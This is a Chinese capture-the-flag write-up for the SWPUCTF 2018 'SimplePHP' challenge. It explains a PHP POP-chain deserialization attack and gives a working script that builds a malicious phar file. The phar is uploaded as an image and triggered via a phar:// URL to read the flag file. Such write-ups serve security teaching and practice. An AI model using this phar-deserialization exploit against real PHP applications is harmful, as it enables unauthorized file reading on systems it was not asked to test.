M4xlmum
M4xlmum

【SWPUCT 2018】SimplePHP

tags: [phar反序列化, ctf, web]

拿下代码

先通过查看文件的功能拿下全部的文件代码,分别是index.phpbase.phpfile.phpupload_file.phpfunction.phpclass.php。然后粗略看下代码,有个提示(不知道是不是后面放上去的),就是class.php那里。


class C1e4r
{
     
    public $test;
    public $str;
    public function __construct($name)
    {
     
        $this->str = $name;
    }
    public function __destruct()
    {
     
        $this->test = $this->str;
        echo $this->test;
    }
}

class Show
{
     
    public $source;
    public $str;
    public function __construct($file)
    {
     
        $this->source = $file;   //$this->source = phar://phar.jpg
        echo $this->source;
    }

    public function __toString()
    {
     
        $content = $this->str['str']->source;
        return $content;
    }

    public function __set($key,$value)
    {
     
        $this->$key = $value;
    }
    public function _show()
    {
     
        if(preg_match('/http|https|file:|gopher|dict|\.\.|f1ag/i',$this->source)) {
     
            die('hacker!');
        } else {
     
            highlight_file($this->source);
        }
        
    }
    public function __wakeup()
    {
     
        if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {
     
            echo "hacker~";
            $this->source = "index.php";
        }
    }
}
class Test
{
     
    public $file;
    public $params;
    public function __construct()
    {
     
        $this->params = array();
    }

    public function __get($key)
    {
     
        return $this->get($key);
    }

    public function get($key)
    {
     
        if(isset($this->params[$key])) {
     
            $value = $this->params[$key];
        } else {
     
            $value = "index.php";
        }
        return $this->file_get($value);
    }
    public function file_get($value)
    {
     
        $text = base64_encode(file_get_contents($value));
        return $text;
    }
}
?>

审计与pop链的构造

首先是C1e4r类的__destruct()方法,可以把$test也就是$str给输出出来。想要输出flag就得将$str的内容为flag文件,将$str声明为$show对象可以触发show类中的__toString()方法。

然后是show类的__toString()方法,可以把$content的内容返回对象,这就要求$show->str['str']->source的内容为flag文件,若$show->str['str']为test类的一个实例化对象,则因test类里面没有source属性,从而触发__get()方法。

最后就是test类了,利用__get()get()file_get($value)到最后返回出来, v a l u e 的 值 为 ‘ value的值为` valuethis->params[$key]`,

下为pop链函数


class C1e4r
{
     
    public $test;
    public $str;
}

class Show
{
     
    public $source;
    public $str;
}
class Test
{
     
    public $file;
    public $params;

}

$c1e4r = new C1e4r();
$show = new Show();
$test = new Test();

$test->params['source'] = "/var/www/html/f1ag.php";  //目标文件
$c1e4r->str = $show;   //触发__toString(),利用 `$this->test = $this->str; echo $this->test;`
$show->str['str'] = $test;  //触发__get(),利用 `$this->str['str']->source`;

第一个__tostring()的触发是因为对象被当做字符串了,第二个__get()方法触发是因为test类里面没有source属性。

phar文件制作及利用

phar文件制作脚本:


class C1e4r
{
     
    public $test;
    public $str;
}

class Show
{
     
    public $source;
    public $str;
}
class Test
{
     
    public $file;
    public $params;

}

$c1e4r = new C1e4r();
$show = new Show();
$test = new Test();

$test->params['source'] = "/var/www/html/f1ag.php";  //目标文件
$c1e4r->str = $show;   //触发__toString(),利用 `$this->test = $this->str; echo $this->test;`
$show->str['str'] = $test;  //触发__get(),利用 `$this->str['str']->source`;


$phar = new Phar("7.phar"); //生成phar文件
$phar->startBuffering();
$phar->setStub('');
$phar->setMetadata($c1e4r); //触发头是C1e4r类
$phar->addFromString("test.txt", "test"); //生成签名
$phar->stopBuffering();

本地访问一下生成文件后改下后缀名为.png,上传。上传之后可以在upload目录下发现刚上传的图片,在function.php的源码里面可以发现下面的这条语句

if(file_exists("upload/" . $filename)) {
      
        unlink($filename); 
    }

从而得知文件的目录。。。阿巴阿巴,目录直接就开着呢,就比较好找。

触发phar://获得flag

访问格式如下

http://b96da071-0c04-4abe-96c6-ea5cf235782d.node3.buuoj.cn/file.php?file=phar://upload/2fe9104ed353a3e60ed55404e1abf179.jpg

【SWPUCT 2018】SimplePHP_第1张图片

获得base64转化后的内容解码一下即为flag。

  __HALT_COMPILER(); ?>
PD9waHAgDQoJLy8kYSA9ICdmbGFnezBlNjg3NzQzLWM5NWQtNDJhMi04Nzk5LWM0MzIwNjU1MjBjMH0nOw0KID8+DQoNCg==

你可能感兴趣的:(CTF,php,web,phar反序列化)

  • 原生cesium 实现 多图例展示+点聚合(base64图标)
    个人简介:某大型测绘遥感企业资深Webgis开发工程师,软件设计师(中级)、CSDN优质创作者作者:柳晓黑胡椒❣️专栏:cesium实践(原生)若有帮助,还请关注➕点赞➕收藏,不行的话我再努努力需求背景解决思路解决效果index.vue需求背景1.需要展示多个站点图例的图表及闪烁效果2.需要考虑层级高时,多图例的点聚合效果,且点聚合显示需要采用设计的圆形图标解决思路闪烁效果:采用css3的anim
  • 一文讲清楚React Fiber 许先森森 Reactreact.jsjavascript前端ReactFiber
    文章目录一文讲清楚ReactFiber1.基础概念1.1浏览器刷新率(帧)1.2JS执行栈1.3时间分片1.4链表2.ReactFiber是如何实现更新过程控制2.1任务拆分2.2挂起、恢复、终止2.2.1挂起2.2.2恢复2.2.3终止2.3任务具备优先级一文讲清楚ReactFiber1.基础概念1.1浏览器刷新率(帧)页面都是一帧一帧绘制出来的,浏览器大多是60Hz(60帧/s),每一帧耗时1
  • React-Ts项目中配置路径别名@ wisuky 前端项目相关配置react.js前端前端框架
    方案一:配置webpack.config.js在react脚手架搭建的项目中,webpack.config.js配置文件是隐藏的,需要通过npmruneject打开,并且该操作是不可逆的,所以不建议使用该方案。方案二:使用craco库1.安装cracoyarnadd-D@craco/cracoORnpmi-D@craco/craco2.在项目根目录中创建craco.config.js配置文件,并添
  • 抽象工厂模式在React Hooks中的应用
    抽象工厂模式的概念抽象工厂模式是所有形态的工厂模式中最为抽象和最具一般性的一种形态。当有多个抽象角色时会使用这种模式。它为创建一组相关或相互依赖的对象提供一个接口,而且无需指定它们的具体类。在抽象工厂模式中有几个重要角色:抽象工厂(AbstractFactory):它声明了一组用于创建一族产品的方法,每一个方法对应一种产品。例如,在一个图形绘制系统中,可能有一个抽象工厂接口ShapeFactory
  • 一文吃透DApp生命周期 代码羊羊 区块链web3web3区块链
    一、引言在Web3的宏大版图中,去中心化应用(DApp)无疑占据着核心地位,是推动Web3发展的重要力量。DApp基于区块链技术构建,与传统应用相比,它具有去中心化、开源、自治、数据加密存储等特性,这些特性赋予了DApp更高的安全性、透明度以及用户自主性,也因此,DApp在金融、游戏、社交、供应链等众多领域展现出巨大的应用潜力,成为了众多开发者和企业探索Web3世界的重要方向。要开发出一个成功的D
  • 已解决:React在Chrome F12 调试台断点调试中跳过node_modules内部黑盒 gzzeason react.jschromejavascript浏览器控制台React源码
    一、debugger代码如下当我在探究根节点和容器源码时候,将debugger代码添加在如下位置:importReactfrom'react';//用到JSXimportReactDOMfrom'react-dom/client';importAppfrom'./App';constparent_node=document.getElementById('root');//获取根节点debugge
  • Python编程菜鸟教程:从入门到精通的完全指南_python菜鸟教程 2401_89285717 python开发语言
    我们将介绍Python在数据科学、机器学习、Web开发等方面的应用,并带你了解Python社区和生态系统。基础入门Python安装:在官方网站下载安装包,根据不同操作系统进行安装。Mac用户可直接使用Homebrew进行安装Windows用户需下载安装包后进行手动安装Linux用户可使用apt-get或yum进行安装基础语法:Python是一种解释型语言,支持面向对象、函数式和面向过程等多种编程范
  • PHP/Laravel + Vue3 + MySQL组合版本参考
    以下是基于技术栈流行度、稳定性和开发效率综合评估的推荐版本组合1.后端技术栈PHP8.3最新稳定版,支持JIT编译,性能较PHP8.1提升15%+,完美兼容Laravel框架。扩展要求:openssl、pdo_mysql、mbstring(Laravel强制依赖)。Laravel11.x2024年发布,支持PHP8.2-8.3,提供轻量级应用骨架和更快的路由缓存。关键特性:原生支持Docker沙盒
  • PHP/Laravel + Vue3 + MySQL + Docker 项目搭建全流程指南(Al总结版未测试未编辑) 野生yumeko phplaravelmysql
    PHP/Laravel+Vue3+MySQL+Docker项目搭建全流程指南一、环境准备(仅需Docker)安装DockerDesktopWindows/macOS:下载DockerDesktop并安装。Linux:安装docker-ce和docker-compose-plugin。#Ubuntu示例sudoaptupdate&&sudoaptinstalldocker-cedocker-comp
  • PHP 命令行工具的常用选项详解 半桶水专家 phpphp开发语言
    PHPCLI常用选项详解-f:运行脚本文件php-fscript.php等同于:phpscript.php执行指定的PHP文件。-r:运行一段PHP代码php-r'echo"HelloWorld\n";'可快速运行一小段代码,不需要加::启动内建Web服务器php-S127.0.0.1:8000用于开发环境调试,默认当前目录为文档根目录(可配合-t使用)。-t:指定Web根目录php-Slocal
  • 基于FCGI的web后端服务程序设计 aiprtem web嵌入式Linux前端
    基于FCGI的web后端服务程序设计1.概述FastCGI(FCGI)是一种让交互程序与Web服务器通信的协议,是CGI(CommonGatewayInterface)的增强版本。FCGI进程可以常驻内存,处理多个请求,避免了CGI每次请求都需要创建新进程的开销。本文将详细介绍一个FCGI常驻服务程序的设计与实现,包括FCGI初始化、守护进程模式、服务启动和停止等关键环节。项目源码:https:/
  • 【转载】python json
    概念序列化(Serialization):将对象的状态信息转换为可以存储或可以通过网络传输的过程,传输的格式可以是JSON、XML等。反序列化就是从存储区域(JSON,XML)读取反序列化对象的状态,重新创建该对象。JSON(JavaScriptObjectNotation):一种轻量级数据交换格式,相对于XML而言更简单,也易于阅读和编写,机器也方便解析和生成,Json是JavaScript中的
  • PC端基于SpringBoot架构控制无人机(三):系统架构设计 kangkang- 架构无人机java
    1.引言从大疆到自研飞控的转型,在无人机业务开发过程中,大部分工作都是基于大疆无人机的上云SDK来完成的。通过该SDK,可以轻松实现航线飞行、指点飞行、实时操控、一键起飞、云台拍照等多种功能然而,随着业务的逐步发展,公司逐渐将重点从大疆无人机转向了自研无人机系统。为了更好地满足客户需求,尤其是在PC端通过Web浏览器进行实时操作的需求,我们的软件团队面临着巨大的挑战。在此背景下,我们需要开发一个与
  • SpringBoot-18-企业云端开发实践之web开发基础 皮皮冰燃 SpringBootspringboot后端
    文章目录1环境准备1.1Web应用概念介绍1.2开发环境配置2SpringBoot快速上手2.1SpringBoot介绍2.2新建项目示例2.2.1Springinitializr2.2.2pom.xml2.2.3HelloController.java2.3开发环境热部署2.3.1pom.xml2.3.2application.properties(可选)2.3.3IDEA工具设置热部署3web
  • 基于Abp Vnext、FastMCP构建一个企业级的模型即服务(MaaS)平台方案 NetX行者 AbpvnextMaasAbpvnextFastMCP企业级平台解决方案开源python
    企业级MaaS平台技术可行性分析报告一、总体技术架构HTTP/WebSocketgRPC/RESTgRPC/RESTgRPCVue3前端ABPvNextAPI网关.NET9业务微服务ABPvNextMCPClientFastMCP模型仓库PyTorch/TensorFlowHuggingFaceHeyGem/ChatGLM自定义模型统一鉴权中心二、核心框架与中间件组件技术选型官方链接作用前端框架V
  • Sa-Token完全学习指南
    目录1.Sa-Token简介1.1什么是Sa-Token?1.2Sa-Token架构图1.3Sa-Tokenvs其他框架1.4适用场景2.环境搭建与快速开始2.1Maven依赖SpringBoot环境WebFlux环境2.2基础配置application.yml配置2.3创建启动类2.4第一个登录接口2.5统一响应类2.6全局异常处理3.核心API详解3.1StpUtil核心方法登录相关APITo
  • Nginx完全指南 - 从入门到精通(加强版)
    目录1.Nginx简介与架构原理1.1什么是Nginx?1.2Nginx的核心优势1.2.1高并发处理能力1.2.2内存占用极低1.2.3模块化架构1.3Nginx工作原理详解1.3.1Master-Worker模型1.3.2事件驱动模型1.4Nginxvs其他Web服务器2.Nginx安装与环境准备2.1安装前准备2.1.1系统要求2.1.2依赖包安装2.2安装方式详解2.2.1包管理器安装(推
  • Pod调度、嵌入式脚本、Pod标签管理 yanjiaweiya 云原生kubernetes容器
    多容器Pod案例3排错[root@master~]#vimweb2.yaml---kind:PodapiVersion:v1metadata:name:web2namespace:defaultspec:containers:-name:nginximage:myos:nginx-name:apacheimage:myos:httpdstatus:{}[root@master~]#kubectla
  • 大学生HTML期末大作业——HTML+CSS+JavaScript传统文化 无·糖 Web前端期末大作业html课程设计css大学生前端大作业期末作业
    HTML+CSS+JS【传统文化】网页设计期末课程大作业web前端开发技术web课程设计网页规划与设计文章目录一、网站题目二、网站描述三、网站介绍四、网站效果五、️网站代码六、️‍如何学习进步七、‍☠️更多干货文章目录一、网站题目传统文化精美设计5页含注册登录二、网站描述总结了一些学生网页制作的经验:一般的网页需要融入以下知识点:div+css布局、浮动、定位、高级css、表格、表单及验证、js轮
  • Puppeteer 库简介:背景、用法与原理 超级土豆粉 typescriptjavascript前端html开发语言
    Puppeteer库简介:背景、用法与原理一、背景Puppeteer是Google官方推出的一个Node.js库,最初于2017年发布。它为开发者提供了一个高级API,用于通过编程方式控制Chrome或Chromium浏览器。Puppeteer主要用于自动化网页操作、爬虫、UI测试、生成PDF截图等场景。随着Web自动化需求的增长,Puppeteer逐渐成为前端开发、测试和数据采集领域的重要工具。
  • 2025 年前端主流框架对比和竞争格局及趋势发展
    2025年前端框架的竞争格局呈现出主流框架稳定演进、新兴技术快速渗透的特点,同时全栈整合、跨端效能、AI集成成为核心发展方向。以下是基于最新行业动态和技术实践的深度解析:一、主流框架竞争态势与核心能力1.React:企业级生态的持续统治力市场地位:全球使用率超40%,尤其在金融、社交等数据密集型场景占据主导。字节跳动、腾讯等大厂的复杂Web应用仍以React为首选。技术突破:并发模式(Concur
  • ThinkPHP 如何在生产环境中配置日志? 深山技术宅 PHP经验数据库php后端ThinkPHP
    在ThinkPHP生产环境中配置日志时,需要重点关注稳定性、性能和安全。以下是最佳实践配置方案:生产环境推荐配置(config/log.php)return['default'=>env('log.channel','stack'),'channels'=>[//组合通道(核心配置)'stack'=>['type'=>'stack','channels'=>['daily','error_file
  • java项目报错405_405报错是什么原因_状态码405是什么错误 跳动的数字 java项目报错405
    今天网站遇到一个问题:httppost请求网页会出现405,分析了下原因:是因为Apache、IIS、Nginx等绝大多数web服务器,都不允许静态文件响应POST请求。下面是解决方案:将post请求改为get请求XF405/XF400支持拍摄4KUHD(3840x2160)50P影像。采用了一枚1.0型大尺寸影像传感器,该传感器的尺寸约为传统机型传感器的6.8倍。MP4格式的文件可设置为自动继续
  • 蓝队应急思路分享 四个月拿下 网络
    一、应急响应应急响应的流程如下:1)首先判断服务器资产、影响范围以及严重程度,确认有没有必要将被攻击的服务器下线隔离,然后根据服务器的失陷时间和态势感知的告警,判断是由什么漏洞进来的2)其次就是取证排查阶段,如果是web漏洞,就是查看web日志,根据失陷时间节点往上排查是否上传webshell;再查看后门是否有恶意的命令执行、文件上传。如果有恶意的文件比如说.exe,可以放到一些微步社区平台分析;
  • 《手把手教你》系列技巧篇(二十二)-java+ selenium自动化测试-webdriver处理浏览器多窗口切换上卷(详细教程) 北京-宏哥 javaselenium测试工具开发语言自动化
    1.简介上一篇讲解和分享了如何获取浏览器窗口的句柄,那么今天这一篇就是讲解获取后我们要做什么,就是利用获取的句柄进行浏览器窗口的切换来分别定位不同页面中的元素进行操作。2.为什么要切换窗口?Selenium在当前页面打开了新的窗口,此时就需要跳转到新的窗口去,就需要把窗口进行切换。宏哥这里简单举例一个测试场景,你在页面A点击一个连接,会在新的tab窗口打开页面B,这个时候,你在页面B点击一个连接,
  • 豆瓣8.6分神作:这本《JavaScript DOM编程艺术》,凭什么让前端人读了12年仍奉为圭臬? 阿蒙Armon 前端javascript开发语言
    豆瓣8.6分神作:这本《JavaScriptDOM编程艺术》,凭什么让前端人读了12年仍奉为圭臬?如果你是Web开发者,一定听过这样的困惑:“学了一堆JavaScript语法,却还是写不出流畅的动态交互?”“懂HTML和CSS,可面对DOM操作总觉得隔层纱?”别急,有一本豆瓣8.6分、5星好评占比47.4%的经典,早就为这些问题准备好了答案——它就是《JavaScriptDOM编程艺术(第2版)》
  • Web-API-day1 DOM 文档对象模型 码哥DFS 前端javascript
    获取DOM对象1.querySelector(")满足条件第一个元素2.querySelectorAll(")满足条件的元素集合返回伪数组3.了解其他方式1)getElementById2)getElementByTagname操作元素内容修改DOM文本内容1)innerText将文本内容添加/更细到任意标签位置,文本包含的标签不会被解析2)innerHTML将文本内容添加/更细到任意标签位置,文
  • Web-API-day2 间歇函数setInterval与事件监听addEvenListener 码哥DFS javascript前端
    1.间歇函数setInterval(函数,间隔时间)时间单位为毫秒functionfn(){console.log('hello')}letn=setInterval(fn,1000)console.log(n)关闭间歇函数clearInterval(变量名)2.事件监听元素对象.addEvenListener('事件类型',执行函数)事件类型:鼠标事件:click(点击)、mouseenter(
  • 内网穿透和路由器端口映射什么区别? 呆萌很 计算机网络原理网络
    内网穿透:俗称打洞,需要一个中间商来帮你。首先你主动去中间商那里注册(当然都是你在你的局域网内装的内网穿透软件自动完成的)你要提供的服务,比如web默认是80号端口。当你去注册时,你发送的数据会一层一层的穿透路由器(你的路由器,宽带商的路由器),发送时必须有一个发送端口。每经过一层路由器路由器都会变换一个IP变换一个端口(就是NAt)。这个数据最后到达中间服务商。端口映射/端口转发:是指路由获得公
  • 接口服务类安全测试(WSDL) @Camelus 渗透与攻防安全javaweb安全
    目录前言:(一)API接口WSDL判断方法漏洞关键字端口号端口说明攻击技巧总结:前言:根据前期信息收集针对目标端口服务类探针后进行的安全测试,主要涉及攻击方法:口令安全,WEB类漏洞,版本漏洞等,其中产生的危害可大可小,属于端口服务/第三方服务类安全测试。一般在已知应用无思路的情况下选用的安全测试方案。(一)API接口webserviceRESfulAPThttps://xz.aliyun.com
  • JAVA中的Enum 周凡杨 javaenum枚举
    Enum是计算机编程语言中的一种数据类型---枚举类型。 在实际问题中,有些变量的取值被限定在一个有限的范围内。     例如,一个星期内只有七天 我们通常这样实现上面的定义: public String monday; public String tuesday; public String wensday; public String thursday
  • 赶集网mysql开发36条军规 Bill_chen mysql业务架构设计mysql调优mysql性能优化
    (一)核心军规 (1)不在数据库做运算    cpu计算务必移至业务层; (2)控制单表数据量    int型不超过1000w,含char则不超过500w;    合理分表;    限制单库表数量在300以内; (3)控制列数量    字段少而精,字段数建议在20以内
  • Shell test命令 daizj shell字符串test数字文件比较
    Shell test命令 Shell中的 test 命令用于检查某个条件是否成立,它可以进行数值、字符和文件三个方面的测试。 数值测试 参数 说明 -eq 等于则为真 -ne 不等于则为真 -gt 大于则为真 -ge 大于等于则为真 -lt 小于则为真 -le 小于等于则为真 实例演示: num1=100 num2=100if test $[num1]
  • XFire框架实现WebService(二) 周凡杨 javawebservice
       有了XFire框架实现WebService(一),就可以继续开发WebService的简单应用。 Webservice的服务端(WEB工程): 两个java bean类: Course.java    package cn.com.bean; public class Course {     private
  • 重绘之画图板 朱辉辉33 画图板
           上次博客讲的五子棋重绘比较简单,因为只要在重写系统重绘方法paint()时加入棋盘和棋子的绘制。这次我想说说画图板的重绘。        画图板重绘难在需要重绘的类型很多,比如说里面有矩形,园,直线之类的,所以我们要想办法将里面的图形加入一个队列中,这样在重绘时就
  • Java的IO流 西蜀石兰 java
    刚学Java的IO流时,被各种inputStream流弄的很迷糊,看老罗视频时说想象成插在文件上的一根管道,当初听时觉得自己很明白,可到自己用时,有不知道怎么代码了。。。 每当遇到这种问题时,我习惯性的从头开始理逻辑,会问自己一些很简单的问题,把这些简单的问题想明白了,再看代码时才不会迷糊。 IO流作用是什么? 答:实现对文件的读写,这里的文件是广义的; Java如何实现程序到文件
  • No matching PlatformTransactionManager bean found for qualifier 'add' - neither 林鹤霄
    java.lang.IllegalStateException: No matching PlatformTransactionManager bean found for qualifier 'add' - neither qualifier match nor bean name match!   网上找了好多的资料没能解决,后来发现:项目中使用的是xml配置的方式配置事务,但是
  • Row size too large (> 8126). Changing some columns to TEXT or BLOB aigo column
    原文:http://stackoverflow.com/questions/15585602/change-limit-for-mysql-row-size-too-large   异常信息: Row size too large (> 8126). Changing some columns to TEXT or BLOB or using ROW_FORMAT=DYNAM
  • JS 格式化时间 alxw4616 JavaScript
    /** * 格式化时间 2013/6/13 by 半仙 [email protected] * 需要 pad 函数 * 接收可用的时间值. * 返回替换时间占位符后的字符串 * * 时间占位符:年 Y 月 M 日 D 小时 h 分 m 秒 s 重复次数表示占位数 * 如 YYYY 4占4位 YY 占2位<p></p> * MM DD hh mm
  • 队列中数据的移除问题 百合不是茶 队列移除
         队列的移除一般都是使用的remov();都可以移除的,但是在昨天做线程移除的时候出现了点问题,没有将遍历出来的全部移除,  代码如下;      // package com.Thread0715.com; import java.util.ArrayList; public class Threa
  • Runnable接口使用实例 bijian1013 javathreadRunnablejava多线程
    Runnable接口 a.       该接口只有一个方法:public void run(); b.       实现该接口的类必须覆盖该run方法 c.       实现了Runnable接口的类并不具有任何天
  • oracle里的extend详解 bijian1013 oracle数据库extend
    扩展已知的数组空间,例: DECLARE TYPE CourseList IS TABLE OF VARCHAR2(10); courses CourseList; BEGIN -- 初始化数组元素,大小为3 courses := CourseList('Biol 4412 ', 'Psyc 3112 ', 'Anth 3001 '); --
  • 【httpclient】httpclient发送表单POST请求 bit1129 httpclient
    浏览器Form Post请求 浏览器可以通过提交表单的方式向服务器发起POST请求,这种形式的POST请求不同于一般的POST请求 1. 一般的POST请求,将请求数据放置于请求体中,服务器端以二进制流的方式读取数据,HttpServletRequest.getInputStream()。这种方式的请求可以处理任意数据形式的POST请求,比如请求数据是字符串或者是二进制数据 2. Form
  • 【Hive十三】Hive读写Avro格式的数据 bit1129 hive
     1. 原始数据 hive> select * from word; OK 1 MSN 10 QQ 100 Gtalk 1000 Skype      2. 创建avro格式的数据表   hive> CREATE TABLE avro_table(age INT, name STRING)STORE
  • nginx+lua+redis自动识别封解禁频繁访问IP ronin47
    在站点遇到攻击且无明显攻击特征,造成站点访问慢,nginx不断返回502等错误时,可利用nginx+lua+redis实现在指定的时间段 内,若单IP的请求量达到指定的数量后对该IP进行封禁,nginx返回403禁止访问。利用redis的expire命令设置封禁IP的过期时间达到在 指定的封禁时间后实行自动解封的目的。 一、安装环境: CentOS x64 release 6.4(Fin
  • java-二叉树的遍历-先序、中序、后序(递归和非递归)、层次遍历 bylijinnan java
    import java.util.LinkedList; import java.util.List; import java.util.Stack; public class BinTreeTraverse { //private int[] array={ 1, 2, 3, 4, 5, 6, 7, 8, 9 }; private int[] array={ 10,6,
  • Spring源码学习-XML 配置方式的IoC容器启动过程分析 bylijinnan javaspringIOC
    以FileSystemXmlApplicationContext为例,把Spring IoC容器的初始化流程走一遍: ApplicationContext context = new FileSystemXmlApplicationContext ("C:/Users/ZARA/workspace/HelloSpring/src/Beans.xml&q
  • [科研与项目]民营企业请慎重参与军事科技工程 comsci 企业
         军事科研工程和项目 并非要用最先进,最时髦的技术,而是要做到“万无一失”    而民营科技企业在搞科技创新工程的时候,往往考虑的是技术的先进性,而对先进技术带来的风险考虑得不够,在今天提倡军民融合发展的大环境下,这种“万无一失”和“时髦性”的矛盾会日益凸显。。。。。。所以请大家在参与任何重大的军事和政府项目之前,对
  • spring 定时器-两种方式 cuityang springquartz定时器
    方式一: 间隔一定时间 运行 <bean id="updateSessionIdTask" class="com.yang.iprms.common.UpdateSessionTask" autowire="byName" /> <bean id="updateSessionIdSchedule
  • 简述一下关于BroadView站点的相关设计 damoqiongqiu view
    终于弄上线了,累趴,戳这里http://www.broadview.com.cn   简述一下相关的技术点   前端:jQuery+BootStrap3.2+HandleBars,全站Ajax(貌似对SEO的影响很大啊!怎么破?),用Grunt对全部JS做了压缩处理,对部分JS和CSS做了合并(模块间存在很多依赖,全部合并比较繁琐,待完善)。   后端:U
  • 运维 PHP问题汇总 dcj3sjt126com windows2003
    1、Dede(织梦)发表文章时,内容自动添加关键字显示空白页 解决方法: 后台>系统>系统基本参数>核心设置>关键字替换(是/否),这里选择“是”。 后台>系统>系统基本参数>其他选项>自动提取关键字,这里选择“是”。   2、解决PHP168超级管理员上传图片提示你的空间不足 网站是用PHP168做的,反映使用管理员在后台无法
  • mac 下 安装php扩展 - mcrypt dcj3sjt126com PHP
    MCrypt是一个功能强大的加密算法扩展库,它包括有22种算法,phpMyAdmin依赖这个PHP扩展,具体如下: 下载并解压libmcrypt-2.5.8.tar.gz。 在终端执行如下命令: tar zxvf libmcrypt-2.5.8.tar.gz cd libmcrypt-2.5.8/ ./configure --disable-posix-threads --
  • MongoDB更新文档 [四] eksliang mongodbMongodb更新文档
    MongoDB更新文档 转载请出自出处:http://eksliang.iteye.com/blog/2174104 MongoDB对文档的CURD,前面的博客简单介绍了,但是对文档更新篇幅比较大,所以这里单独拿出来。 语法结构如下: db.collection.update( criteria, objNew, upsert, multi) 参数含义 参数   
  • Linux下的解压,移除,复制,查看tomcat命令 y806839048 tomcat
    重复myeclipse生成webservice有问题删除以前的,干净 1、先切换到:cd usr/local/tomcat5/logs 2、tail -f catalina.out 3、这样运行时就可以实时查看运行日志了 Ctrl+c 是退出tail命令。 有问题不明的先注掉   cp /opt/tomcat-6.0.44/webapps/g
  • Spring之使用事务缘由(3-XML实现) ihuning spring
      用事务通知声明式地管理事务   事务管理是一种横切关注点。为了在 Spring 2.x 中启用声明式事务管理,可以通过 tx Schema 中定义的 <tx:advice> 元素声明事务通知,为此必须事先将这个 Schema 定义添加到 <beans> 根元素中去。声明了事务通知后,就需要将它与切入点关联起来。由于事务通知是在 <aop:
  • GCD使用经验与技巧浅谈 啸笑天 GC
    前言 GCD(Grand Central Dispatch)可以说是Mac、iOS开发中的一大“利器”,本文就总结一些有关使用GCD的经验与技巧。 dispatch_once_t必须是全局或static变量 这一条算是“老生常谈”了,但我认为还是有必要强调一次,毕竟非全局或非static的dispatch_once_t变量在使用时会导致非常不好排查的bug,正确的如下: 1
  • linux(Ubuntu)下常用命令备忘录1 macroli linux工作ubuntu
    在使用下面的命令是可以通过--help来获取更多的信息1,查询当前目录文件列表:ls ls命令默认状态下将按首字母升序列出你当前文件夹下面的所有内容,但这样直接运行所得到的信息也是比较少的,通常它可以结合以下这些参数运行以查询更多的信息:  ls / 显示/.下的所有文件和目录  ls -l 给出文件或者文件夹的详细信息 ls -a 显示所有文件,包括隐藏文
  • nodejs同步操作mysql qiaolevip 学习永无止境每天进步一点点mysqlnodejs
    // db-util.js var mysql = require('mysql'); var pool = mysql.createPool({ connectionLimit : 10, host: 'localhost', user: 'root', password: '', database: 'test', port: 3306 });
  • 一起学Hive系列文章 superlxw1234 hiveHive入门
      [一起学Hive]系列文章 目录贴,入门Hive,持续更新中。   [一起学Hive]之一—Hive概述,Hive是什么 [一起学Hive]之二—Hive函数大全-完整版 [一起学Hive]之三—Hive中的数据库(Database)和表(Table) [一起学Hive]之四-Hive的安装配置 [一起学Hive]之五-Hive的视图和分区 [一起学Hive
  • Spring开发利器:Spring Tool Suite 3.7.0 发布 wiselyman spring
    Spring Tool Suite(简称STS)是基于Eclipse,专门针对Spring开发者提供大量的便捷功能的优秀开发工具。   在3.7.0版本主要做了如下的更新:   将eclipse版本更新至Eclipse Mars 4.5 GA Spring Boot(JavaEE开发的颠覆者集大成者,推荐大家学习)的配置语言YAML编辑器的支持(包含自动提示,
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他